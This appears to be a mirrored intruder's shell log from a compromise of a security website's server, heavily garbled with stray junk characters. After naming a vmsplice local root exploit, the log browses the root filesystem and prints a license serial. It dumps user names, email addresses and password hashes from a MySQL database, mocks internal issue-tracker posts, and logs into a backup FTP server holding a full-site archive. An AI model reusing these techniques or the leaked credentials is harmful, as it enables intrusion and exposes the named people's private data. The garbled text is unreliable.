drwx–x–x 10 com com 4096 Apr 28 12:40 .! I( W) \# x$ n6 E8 X
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ Y. K1 w. b `+ r( {. f1 Z
drwx—— 2 com com 4096 Jun 4 04:04 backups
% g. d' Y8 S3 C& Z-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql. R6 q" R* W3 s" x
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system& N) @0 p7 n" p7 W/ F* y
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history' x6 ~' Z, j$ j, Y, u3 n6 m, }
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
. G: O+ e" r+ Y1 @3 J-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile+ Z$ ]& {3 p1 h$ |# o; C
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
6 A9 u9 T: w, R6 H3 B adrwx–x–x 3 com com 4096 Jan 29 2008 domains
& `! F8 r0 d, j+ V: ?/ f-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
! ]% i. h! o; e8 Ydrwxrwx— 3 com mail 4096 Jan 6 19:24 imap9 o- m# G$ P! Q1 |& ?3 G2 M
-rw——- 1 com com 69 Nov 18 2008 .lesshst
; @; J! V2 B5 Kdrwx—— 2 com com 4096 Sep 24 2007 mail
' K& S( K% k) r& J2 `3 ^-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history; T4 _+ s9 {5 p, K4 V; v. O1 D9 a
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
8 N7 e6 P2 O; j8 V" Z0 j) q; J( hlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
5 ^0 s+ J( @' u7 h-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
- a: H! g. `1 Ndrwx—— 2 com com 4096 Aug 26 2008 .ssh3 E( m0 q4 |1 [% d1 o. a$ Q
-rwx—— 1 com com 8515 Feb 10 2008 t
( A5 x$ w7 {' P-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
; X/ |" [5 n2 n6 \) t- ?- |drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
% M( c# f. O# x% }, }* b-rw-rw-r– 1 com com 617 May 20 2008 .toprc
* `8 i* M. a& ]. e& F5 J# z-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
" N1 K. c" Y5 L- z% M2 [-rw——- 1 com com 16629 Mar 28 21:46 .viminfo+ z/ v# `7 f& H& T0 m
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc7 C3 p* D( C* Y% g$ Y* O1 i- h% Q
- y' i0 D2 z: J4 S& J
sh-3.2# head t.c
% [% t/ o, ~9 q# z/*
$ o# ?. Z' L. u) T% c% [* jessica_biel_naked_in_my_bed.c
$ J! W6 ~/ g5 W( h; R*8 Y/ o; V# o3 h6 l! D
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.1 y9 d3 G- H: d) ^4 x0 O
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
K* t3 |3 V: D* Stejnak je to stare jak cyp a aj jakesyk rozbite.: w1 r% ~7 H1 _( W: B8 Z, z
*3 r+ F. B. j; c' M0 Y+ h# I
* Linux vmsplice Local Root Exploit
7 @1 i4 U7 R+ y3 N) v# g# ~4 [* By qaaz
h7 X/ {( l$ ]! G s0 C2 V! e*- n# \0 o ^4 E" n, }+ N, P7 B
' x7 d7 V: f* N6 d$ @' ksh-3.2# cd /
# ]) }$ G9 z0 V) a8 j/ X7 \sh-3.2# ls -la, w& A% e- y# J5 v Z
total 3609 r: o, B- M6 C# N1 K: y6 L" ?
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .+ M2 M# P9 P1 O6 w$ k" q
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..4 S2 p' p3 g9 H7 D" O
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
) l o9 |) h; h# ]& q! c9 N-rw——- 1 root root 10240 Jun 3 02:39 aquota.user+ a( e5 O9 X4 a
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db: W) p6 ^* r7 F8 p
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck$ b0 O4 f* b8 n& Q
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
U2 j, t3 K1 \drwxr-xr-x 3 root root 4096 Dec 29 2007 backup8 b) ^8 U7 i1 p g3 I' z9 s
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin9 u) q9 A( ~5 F7 U. u
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot0 G D% Z) A k7 y
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev; C5 a, ~" K' @- r$ F) u; s
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
1 {: d; _" v: V% n1 ], q; L8 ]0 zdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home" `9 d$ `3 O9 R, S% v
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf# n/ N" B. T* G. e$ n: {/ q
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib/ \# Y. u/ @3 k* b" q: ] p
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
@* i! A' n, ldrwx—— 2 root root 16384 Sep 11 2007 lost+found
/ L% F, v: z/ v" mdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media! B) \2 V6 {& N! u" m: d
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc% w! [* b9 E$ Z+ N8 A# y& d4 K" h
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
1 D2 u" Q' C3 {-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg& P3 q1 `3 F/ }: o! W
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
% v F }# ~& [* \! gdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
/ M# i- h! Q% Q9 \/ Edr-xr-xr-x 264 root root 0 Jun 3 02:42 proc }' I+ i! W& E
drwxr-x— 15 root root 4096 Jun 4 08:40 root6 `1 K h- \3 w$ l- Q0 B
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
4 Y% [% h# `& Jdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux [$ C7 d% V0 f- O# R6 u
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv. `; x; C3 R c1 u8 w1 U* X
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
4 \. ?1 F7 l& sdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
- h* X# D6 h( O3 |" A: W" adrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr9 V5 F: X8 \5 x. W9 U# y
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var5 O; A% [# H! K o
; c) Q* J7 b3 n5 X4 v& ^sh-3.2# cd opt
& ^, E$ a* O6 Csh-3.2# ls -la
0 }" g1 U' Z P# k8 n% atotal 20
8 s- B* Z4 @( d; U7 V Edrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
3 ?6 M0 e8 c6 |1 A1 W4 S1 I" ` @drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
3 E5 Q( g3 P, P% u9 e" k( j8 Kdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
3 p$ ~8 n! p6 w7 L0 x# M
& h$ h& ^1 `% [- `* ssh-3.2# cd lsws/& k' ` l% \, N2 K. b" @$ G
sh-3.2# ls -la, }7 B5 O) J+ C/ _) }' a8 H# q n
total 108
* R/ W( d- @' w6 g: y1 I. Wdrwxr-xr-x 15 root root 4096 Mar 20 2008 .
( Z$ _. w: V5 {& m2 [drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
% f. A" ~& `7 u8 n; J' adrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
9 y% F m6 L+ O c3 D0 qdrwxr-xr-x 13 root root 4096 May 29 15:10 admin
% x. U" K( E' L& U2 y( N; A( K5 Tdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
2 ^7 G; a6 s c1 w2 udrwxr-xr-x 2 root root 4096 May 29 15:10 bin& G6 @1 n* M6 t3 X# `* c
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
* e( z) j* r O. z2 ]' a/ jdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT# N1 X4 W4 e- H& \
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
0 F, ?% i5 W! b7 _; ~$ \drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin% F# e# U6 i( o) d7 I8 R
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib/ m' g& v1 m* U- R, N
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
! Y5 I( O' w6 \9 h-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP' V9 r+ ]9 D6 b8 ?& ]4 `5 ]
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL$ K5 |" }* O( ?1 z h7 x
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
$ }% B; p I' v9 ]drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
( d, M" J2 m* @7 |3 h( Vdrwxr-xr-x 2 root root 4096 Mar 20 2008 php$ x. F) a* o: U: x( m# ?
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild2 O. K+ D# e6 u9 j
drwxr-xr-x 3 root root 4096 Mar 20 2008 share4 d5 |: x! `' s
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
0 P. f9 W5 H% z
v2 {" X3 F" ~: Vsh-3.2# cd conf
n. s( p7 `, fsh-3.2# ls -la9 h5 ^8 r9 c# q0 q/ p0 I+ K9 P
total 48
2 n( S+ S8 G+ r! I+ |4 |drwx—— 4 apache apache 4096 Jun 3 02:43 .
! B) X2 w2 t- ^5 L- Q5 sdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
# B: b4 d- w& q8 ]drwx—— 2 apache apache 4096 Mar 20 2008 cert
9 T! U" z- }' p0 @3 f+ h-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
3 f" E# }" m5 v+ w% s-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
1 H+ Y% g) d7 x; U; P- Z' b$ Z-rw-r–r– 1 root apache 0 Jun 3 14:11 .last3 g. |: f0 H5 Z- a# N% G
-rw——- 1 apache apache 256 May 29 15:10 license.key
$ o6 @- M( D6 d% R X' I-rw——- 1 apache apache 256 Mar 21 2008 license.key.old8 F* ?/ q0 P' r, }+ A
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties. r& g- h G. ?+ z3 y" A
-rw——- 1 apache apache 20 May 29 15:10 serial.no4 z/ g2 @3 _6 x- C, B; s( E0 k6 o
drwx—— 2 apache apache 4096 Mar 20 2008 templates
) u. N9 ^0 [, U R2 z7 i" U8 _) ~ r+ `9 W* j
sh-3.2# cat serial.no
+ L* O. h+ Q9 P' r) z* M" `& hIbDl-oVsO-CKqL-wVRa
9 _5 v8 ^0 E1 }4 V( C* I4 F1 [
( ~% A, {" W8 q; P0 h+ N, psh-3.2# mysql
: ]- ^ T$ K& X- O% C# g0 TWelcome to the MySQL monitor. Commands end with ; or \g.9 E" u& \6 j3 K' p2 W6 {1 Q
Your MySQL connection id is 286844
6 X. o1 {8 \; NServer version: 5.0.45-community-log MySQL Community Edition (GPL)- E. Y( U2 l; u" _' m
7 B; `# F7 b4 L t; c' ~% J
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
& N' ~6 W: B2 K J1 G" R/ I# ~) H4 ]- N
mysql> show databases;
$ ?8 f6 i* G B' w/ ~: M" n" n+———————–+
q. k7 F6 u6 k| Database |5 n) M0 F8 q& q1 A
+———————–+
. W7 O- M9 W) N| information_schema |1 n- T% B# w, V, r# d
| astanet_ads |
* ?1 J+ @5 g! D5 S6 H0 n" || astanet_mailing_lists |
' r( l/ ?& K7 J: t- F! l| astanet_mediawiki |5 Y# ~& ^0 z9 Q Y! _
| astanet_membersystem |' S- l7 Z! R1 `% D7 L
| com_contrexx |+ E# i! C2 j' t# d* ]2 q8 `
| com_contrexx2 |8 Z# ?! d1 i# K# q! H& y
| com_contrexx2_live |
" [2 [/ O8 ?) U6 V| da_roundcube |
% U- P. x) Y# d; P1 Y- J8 Z' w" S| dolphin |; `$ _& p3 x. t
| ideapool |
4 B# d2 K5 J- z9 Z6 U# k3 S8 s$ F| mysql |9 c' |0 _! O% O$ z! z$ w* Q
| test |, D! O0 O+ Q/ U9 |
| yourmaster |
" f( K# O5 Y, x+———————–+
" i, q2 ~5 ?6 c* q14 rows in set (0.00 sec)3 k: G# S! A; n% \4 E* ?9 C. c3 K
- s8 }7 W \# C- X8 Y2 emysql> use ideapool9 J. C* @+ U# K, g. F
Database changed
5 \6 F$ L- k; @1 \0 }mysql> show tables;) x9 ]: }9 t6 L
+———————————–+. a7 J. R/ a" I/ e2 H- {
| Tables_in_ideapool |
+ g# V+ ?) h; ^7 L/ c% A% s+———————————–+
, v, p i; {" C. f5 L, U| eventum_columns_to_display |
2 k" o* ], `( ]- O6 R| eventum_custom_field |( n: q5 M" |% u# T
| eventum_custom_field_option |
( ~: X& y+ Q* l7 [# O g| eventum_custom_filter |
; }# F( m: u8 F: p2 G/ y' F( n# o| eventum_customer_account_manager |
. H- B! G6 S% J- S/ [| eventum_customer_note |6 X6 t8 O* z% }- J$ G% q7 I0 u$ x5 F7 B
| eventum_email_account |
% R2 A# l( K7 G4 y) @# V0 k$ M| eventum_email_draft |# G$ U+ [& E1 j4 P7 t8 I
| eventum_email_draft_recipient |, s# w( ^7 g( ^# V: U4 H& Y( S& a
| eventum_email_response |% V- M- k' A; |! ?4 L/ `
| eventum_faq |
( h6 e. l4 f4 R; _| eventum_faq_support_level |. t9 p6 _, e" t
| eventum_group |2 t; `5 W$ @6 ]3 L# M4 r
| eventum_history_type |
/ n8 E& d* q; Q$ I. S/ F `% || eventum_irc_notice |
) Q0 J' R5 P Z4 Z; m" w' T9 z( s4 v| eventum_issue |
7 T7 T" G% J, ^; W4 |% J4 \5 }| eventum_issue_association |. g3 {$ s3 w; k s
| eventum_issue_attachment |: O* p+ t' k' `* y3 N% V( z4 W
| eventum_issue_attachment_file | y# Z# ^) {) r1 Q7 U& @* r
| eventum_issue_checkin |0 `0 g& ~) m( k8 e2 x" _ Z" H
| eventum_issue_custom_field |) B9 }0 j; e8 O9 a& t7 a- ]
| eventum_issue_history |- G5 S' p1 E. P/ N0 W+ v. \
| eventum_issue_quarantine | P" p o7 E7 D+ F
| eventum_issue_requirement |! Y6 }- C2 }& e1 H' X3 |
| eventum_issue_user |
& S( l+ n1 k, G) O) z| eventum_issue_user_replier |( M! B4 R7 c7 V+ e+ |/ H P A) w" @
| eventum_link_filter |3 f1 I6 j2 Z) G: _
| eventum_mail_queue |
' B4 y- L; ?! O `: Y| eventum_mail_queue_log |
; }' M% r) Q. q, B+ `| eventum_news |
8 r9 E) }% E) a' M2 V# ?| eventum_note |
) R. P2 F: a- b' \0 b9 g o2 m; A| eventum_phone_support |3 ?* L' x( X9 S( t" _5 j
| eventum_project |
1 M+ F4 M d3 J& r8 w1 s! m| eventum_project_category |1 X* q& O8 [3 a6 M
| eventum_project_custom_field |9 w! p: {, Z$ j1 P+ F5 p
| eventum_project_email_response |2 K% E8 O# V% y
| eventum_project_field_display |
) T# r# B2 N: I$ B| eventum_project_group |
! s* O9 ~2 D6 F| eventum_project_link_filter |
3 f' L# F; \& N+ z h+ || eventum_project_news |
; R( x8 H- \ k' P0 {: W0 ?$ ^| eventum_project_phone_category |4 t J! C' ~! l8 j# a" A- z
| eventum_project_priority |
! P2 F! L _% J& x6 T ^| eventum_project_release |
& \ W8 H+ P. Y- d0 x| eventum_project_round_robin |9 s, U: w" E( M$ D
| eventum_project_status |
8 G7 \9 n H A4 q+ M| eventum_project_status_date |
5 z) R3 h) z) {| eventum_project_user |) S% ^$ a Y) Y
| eventum_reminder_action |3 Y j8 j3 K6 Q' d# `( O% c
| eventum_reminder_action_list |5 o9 _4 I# U* K" C0 |+ b
| eventum_reminder_action_type |8 _& d- t/ N" W, s( r
| eventum_reminder_field |
0 g* v4 C% w( e: V| eventum_reminder_history |1 w+ V `) n- Y6 {+ |/ J
| eventum_reminder_level |2 Q, p0 q+ l% N' E
| eventum_reminder_level_condition |6 x2 E3 ]" n2 |
| eventum_reminder_operator |6 \6 a# l% c. g* U/ {- p7 R
| eventum_reminder_priority |( q' |/ y# ^: w5 | j9 S5 M
| eventum_reminder_requirement |
- K" M" s1 l8 e3 c9 I9 d8 N0 w3 b| eventum_reminder_triggered_action | H9 Z: Y+ B/ Z, v
| eventum_resolution |
5 k5 a4 J _, @, e" I x4 i4 y| eventum_round_robin_user |) y: @8 h/ ?' W3 L1 v
| eventum_search_profile |
+ L; s* |/ q; m7 B| eventum_status |
' {( z2 b, q2 E! V g2 V| eventum_subscription |) b* R* k9 A. [, \) @4 l! r- d
| eventum_subscription_type |0 I( b4 U( c4 e# ~0 U. l
| eventum_support_email |, Z7 g' C/ l# I
| eventum_support_email_body |
6 O5 u6 a; T$ Y- M| eventum_time_tracking |( z* W% z3 v/ A) W0 `7 k) f
| eventum_time_tracking_category |* Q1 }+ C) {9 o8 Q, ^
| eventum_user |+ r6 u0 h J) B' j3 [
+———————————–+
3 ?8 ^0 w1 Z. K6 C: v/ Z69 rows in set (0.00 sec)
5 O, N* T9 v2 o8 F" a, _. s0 @8 L
mysql> describe eventum_user;$ G2 r3 g; p: _+ n- ]& T+ a
+————————-+——————+——+—–+———————+—————-+9 d2 c- u3 T7 k' h# |
| Field | Type | Null | Key | Default | Extra |4 Y5 t l- _; f. ?0 A- d4 Z
+————————-+——————+——+—–+———————+—————-+5 I2 P$ n: S: i+ A( s6 w
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |4 K5 H+ P9 x4 x5 ]; p0 w" \
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |- C. [9 s1 T5 A0 i5 M G S/ G, S
| usr_customer_id | int(11) unsigned | YES | | NULL | |7 H5 h# M8 Q% n% L* Z' y" r4 S
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
m7 ]0 h/ A2 d( ]| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |: W! ]6 T) A5 b: r
| usr_status | varchar(8) | NO | | active | |6 }+ B: Y) x+ o0 Z
| usr_password | varchar(32) | NO | | | |
1 Q2 j6 F) |( q| usr_full_name | varchar(255) | NO | | | |( Q j' R: O, C& |
| usr_email | varchar(255) | NO | UNI | | |
8 C5 V1 Z8 b3 \/ b, Z| usr_preferences | longtext | YES | | NULL | |
5 ~* J1 Y2 C/ {- P, ?4 L: S| usr_sms_email | varchar(255) | YES | | NULL | |
# c+ O3 N% f8 F& R| usr_clocked_in | tinyint(1) | YES | | 0 | |- u' J; C* E% H: R# ^
| usr_lang | varchar(5) | YES | | NULL | |
$ x; m: L4 u' w9 r# r1 g) x; m1 g+————————-+——————+——+—–+———————+—————-+ ?/ l, ]+ }- S# H
13 rows in set (0.00 sec)
9 V( i6 R% G" d4 c2 z0 V" y3 X
, C3 x e* _" m- ~* h% e( Zmysql> select usr_full_name,usr_email,usr_password from eventum_user;
3 s( q0 Q" W7 u; ^" ~( M8 h( p+———————-+——————————-+———————————-+
6 W5 v& A* v+ W9 k; e3 y. ]! O| usr_full_name | usr_email | usr_password |
+ ~; X; S3 U" E, e+———————-+——————————-+———————————-+
6 Y0 J' X' V7 r, S6 r, k1 K| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
+ p3 `' t: ]3 D' R. i. c! R- {$ E| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
+ l' Z- ^( Y) T! ^| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
6 Y# F; P2 b3 @+ S| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |% s' M1 \2 W* r' k7 e: d
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |9 C9 C8 k5 U' z+ y% O4 \
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
- c% n2 M# ^, j) w8 D* ?" D| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |/ l. ^) ?: Z) F1 T
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |1 D$ _0 s2 X! v# b M
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
: r! J( F# @7 k" P9 M4 w| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
/ M. D. n1 d: u2 G' N; K+ h| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |& F) P! P, x7 p. I) o$ R- ^; X
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
8 ]9 q \6 S: Q5 e* H6 g/ q| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |, a% x9 s: ~: T' c4 \6 s& l4 X
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |2 ]& ?- p6 n8 n2 l1 l" a
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
, v$ P5 t6 e( t3 \2 _+———————-+——————————-+———————————-+7 ^" x$ @5 H! j7 c7 ~+ ~
15 rows in set (0.00 sec) \- O' ` k( H# s F
; F9 f! w2 w& X' p. u" rmysql> select iss_description from eventum_issue where iss_id = 43;
5 @3 w0 K9 K) A0 Y/ H% k2 p; k; } k+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
1 K4 r) s( u, Z* d| iss_description * }6 B) L* j c4 |) Y! a v
|
4 [) W6 V, `5 r7 L. h9 {8 r+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
6 u6 i& D& S* [' |- M9 \| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be: w# a6 t8 J& S5 `
connected for 90 mins… 120mins… so what i propose is something like:8 e$ W; u7 u) N, Z( n9 a: W
链接标记[url]http://www.surfthechannel.com/[/url]4 E. J9 v* w7 }8 y/ F1 E
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system/ d* Z% d ]2 n8 w8 L
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t+ {7 i. C4 g3 c6 C/ J
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off/ \8 @+ t9 n! E+ m0 v
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
/ V! b8 M& \3 J! h
2 ^! M1 C1 `7 Y" B3 ~9 s E: _& jWe could also put advertisement during play on the flash video player itself… extra $$…
; i' u2 Z! j3 D! X+ n; B7 o! X0 k. B3 D# Q6 o6 o
By sykadul |& M2 u! E. _4 L& Y5 c. z2 `# s
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
; e8 S8 Z$ w0 `4 o1 }1 row in set (0.00 sec), L! e7 s) G9 u% ?% |, L& p
. z: A2 {" k8 J* ]9 l
// Money and extra $$ is all they care about. remember that.# L) @0 u$ x' \
! S7 j+ e7 [% V3 A" x8 L' N3 Kmysql> select iss_summary,iss_description from eventum_issue where iss_id =42; f6 t! l( a: K+ l
+————————+——————————————————————————————————————————————————————————————————————————————-+1 `) r% o# [, B+ N- c) _9 u
| iss_summary | iss_description
' l& F$ f% c7 z ||9 B5 l& W$ D; R: k8 n
+————————+——————————————————————————————————————————————————————————————————————————————-+
9 B5 E# W* b; Y5 @* y2 g| Forum for REAL EXPERTS | Hello,
1 w; ^* k2 H6 }! c5 }2 E
& Z E6 e4 o5 \+ b* p& jIshtus and I,2 J- J4 J3 }% |: d. w: ]
! |# l; F3 u+ y% c- M2 m& G0 A
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide" E3 T, E$ t& a# N
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
1 ^5 L' `" c4 b; z9 b( h* l6 g! L2 N4 q8 @& ]
One example a friend of mine from coresecurity.com!8 u. V1 n3 w5 W- ]7 d' \' `
7 Y) V/ A& n4 j
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..2 n/ r9 ?: M' a" F0 g% T: ?# w
+ Y3 {( d" a/ x1 b/ u; Q
|
G6 I' S; b" m1 c5 q+————————+——————————————————————————————————————————————————————————————————————————————+! W+ F! n& U7 D. W, P7 P* S+ f
1 row in set (0.00 sec)5 m9 U0 I: U3 o7 H. o1 S
& J4 a/ X+ ]' w# a; E7 Q2 X/ r; a
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…% a7 h a6 d2 r9 ?
' d( H& R3 Z4 _. C5 p! R i
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;5 C. s1 x1 I- }! r
+——————+———————————————————————————————+
6 v; ]" K- `4 e| iss_summary | iss_description |
& d7 F/ ]: X4 H1 K% ~+——————+———————————————————————————————+
' R6 T' K5 G j0 ]# m/ x| Website guidance | Virtual Girl which guides you trought the website.! Y4 n/ l9 x7 O" H5 M" `/ u; w" N# n
2 N- [0 v" U2 K' r+ ]) N
We need a girl with who you can ( talk )!!!5 [% V4 J( p0 S/ m3 {; T
Also for the News!. `9 H3 V9 M% ]. }1 ]4 L
So my suggestion is a girl who read you the news loud if you like!! o! {2 g* j' F$ m
you can choose between read yourselfe or she read it for you or both!- c3 P1 E# w2 i6 j( T2 `
" X% T4 S6 { w/ z7 n" i
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
- ^1 L( E; N- F- z+ H, j8 L
/ Z; j6 e8 d$ I' a- N7 IHave a look on the example girls!!. p4 k4 x3 I+ y
- L6 a; `' `4 l( ~: Y链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
/ O3 ?6 a* s w3 @7 q2 w
% m, Y! g& O# c9 d6 j% tor that
1 q5 T4 C( t8 s$ K' U* E) r9 G
! u' r- w7 P, l. ?7 i l8 p链接标记[url]http://www.yellostrom.de/[/url]8 c* f0 d! G7 m' T) f2 r
: Q( B- M3 F3 ?& @: P" R; a: Z! c T|
( D# W {, F8 U. d* q6 V* o+——————+———————————————————————————————+
& u- i! ]% h/ b1 row in set (0.00 sec)/ }. D" z" r2 J0 e2 X, |
5 \; T; v8 y- e; {// ha ha.2 K% |6 M+ J& D+ x* j# ~7 m
! }3 @% M) ^4 C! c l8 ?% m7 d5 Y
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
. M- }6 `+ c7 Q4 T& ^5 Y. K+————————–+———————————————————————————————————–++ q6 W$ O+ K1 Y& t/ F+ ]) u
| iss_summary | iss_description |
) ?$ D" Z+ t7 z+————————–+———————————————————————————————————–+
' C+ ^, O; C1 C [| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
3 _2 z' e; ]3 ^+ L+————————–+———————————————————————————————————–+
1 O P/ V- t1 q0 f5 D4 M0 j1 row in set (0.00 sec); r, I4 U# B+ R) C( ?' {6 J
, w4 ^. A1 J. ?2 W3 c// LOL.# [# d2 v) k5 o0 |
% y; d& O4 q2 [mysql> exit
1 i. k+ u$ s* Z- {4 l5 [4 v vBye
6 b5 x) D: J: X# [. e5 H
1 b# n4 ^7 Q) E7 J7 [# [sh-3.2# ftp 212.254.194.163
, O; C7 f5 H/ w2 kConnected to 212.254.194.163.
* Z) ^5 K5 Q5 u220 BackupCOM_VW FTP server ready.
6 w+ L" H K W1 x504 AUTH: security mechanism ‘GSSAPI’ not supported., e4 V5 T1 \2 l5 q( X" k. R
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
' f" H4 ]7 A" ?8 ]KERBEROS_V4 rejected as an authentication type
1 T! E9 Q, S/ c+ FName (212.254.194.163:root): astalavista.com
6 ^0 N, B) t) @3 F/ i( C" I331 Password required for astalavista.com.
2 h/ M/ [% j3 @" b$ h+ DPassword:
5 a6 [0 K, W( Z/ ~0 ~8 Y5 n0 d230 User astalavista.com logged in.$ v0 J. y! H9 ?1 }+ z
Remote system type is UNIX.0 q" y# I5 z; Y( Q7 {/ O& k
Using binary mode to transfer files.1 P7 s1 d0 M$ g1 r2 N" {0 z! J
ftp> ls -la
( X" w2 p9 L- E. r8 t: q2 q5 t227 Entering Passive Mode (212,254,194,163,2,188)& t4 z# }6 S, K2 |6 J$ x3 N3 ~6 J: t
150 Opening BINARY mode data connection for ‘file list’.3 h6 v4 }9 Y+ R+ B5 v; z+ I9 U
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com' y+ {4 q2 I: i$ K, d
226 Transfer complete.
& C5 E: B) G M ]! y Mftp> cd astalavista.com' P$ f$ X( i$ O1 \
250 CWD command successful.
1 P1 z* a4 `8 c% C6 vftp> ls -la; p/ q8 W. d/ D5 _6 q6 \# l
227 Entering Passive Mode (212,254,194,163,2,189)' C/ H/ ~ L0 G! i+ U3 K5 r: [8 g
150 Opening BINARY mode data connection for ‘file list’.
5 D0 D% N4 s% p: \-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
